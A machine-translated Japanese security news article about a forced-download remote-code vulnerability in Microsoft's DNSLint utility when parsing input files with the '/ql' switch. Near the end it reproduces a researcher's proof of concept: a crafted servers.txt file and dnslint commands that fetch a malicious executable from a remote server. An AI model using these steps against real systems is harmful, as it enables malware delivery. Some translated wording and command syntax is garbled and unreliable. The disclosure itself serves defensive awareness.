MicrosoftのDNSLintユーティリティQLスイッチを使用すると、リモートファイルをダウンロードできる可能性があります

セキュリティ / MicrosoftのDNSLintユーティリティQLスイッチを使用すると、リモートファイルをダウンロードできる可能性があります 読んだ2分

マイクロソフト



マイクロソフト DNSLint ユーティリティは、ブラウザを介してアクセスされているさまざまなWebサーバーに割り当てられたIPアドレスに関連するドメインネームシステム(DNS)名検索の問題を診断するために機能します。基本的なWindowsパッケージには含まれていませんが、MicrosoftのWebサイトから無料でダウンロードできます。でグレード7.6(重大)のリモートアクセスの脆弱性 CVSS 3.0 スケールがこのユーティリティに影響を及ぼし、ダウンロードによる強制ドライブが発生することが発見されました。

この脆弱性は、「/ ql」スイッチに従ってDNSテストファイルを解析するときにDNSLintがドメイン名を確認しないという事実から生じます。エンドユーザーが、通常予想されるドメイン名情報ではなく、スクリプトまたはバイナリコードを含むファイルを使用することに成功した場合、システムが危険にさらされ、強制ダウンロードを開始しやすくなる可能性があります。これが発生した場合、ハッカーは悪意のあるファイルの強制ダウンロードを要求し、Webブラウザからアクセスしたときにリモートコマンドをダウンロードして実行する可能性があります。ダウンロードはローカルシステムの場所に保存され、セキュリティアクセスが促されます。ファイルがディスクドライブ上の既知の場所からのものであることがわかると、ユーザーは実行可能ファイルの繰り越しを許可する傾向があります。悪意のあるファイルに特権が付与されると、意図したコードをリモートで実行し、ユーザーのセキュリティとプライバシーを危険にさらす可能性があります。



ジョンページの hyp3rlinx は、この脆弱性をシミュレートする概念実証を作成し、ドメイン名ではなくスクリプトまたはバイナリ参照テキストファイルを使用すると、次のように意図しないファイルがダウンロードされる可能性があることを説明しています。



dnslint.exe / v / y / d“ MALWARE-FILE” / s X.X.X.X / r“ myreport”



DNSLintユーティリティのコンテキストで、脆弱性を悪用してシステムにマルウェアを導入する方法を以下に示します。

1)リモートWebサーバーのルートディレクトリにある「dnslint-update.exe」。
2)「servers.txt」
DNSLint
;これはサンプルのDNSLint入力ファイルです
+このDNSサーバーは次のように呼ばれます:dns1.cp.msft.net
[dns〜server] X.X.X.X
、a、r;記録
X.X.X.X、ptr、r; PTRレコード
test1、cname、r; CNAMEレコード
test2、mx、r; MXレコード
3)dnslint.exe / qlservers.txt

上記のコードは、 権利 このコンテンツへのhyp3rlinxの。この脆弱性を開示していますが、現時点ではこの問題を解決するためのパッチアップデートはないようです。 CVEコードはまだこの脆弱性に割り当てられており、マイクロソフトがこの問題に関する公式のセキュリティ情報にIDを付けて書き込む必要があります。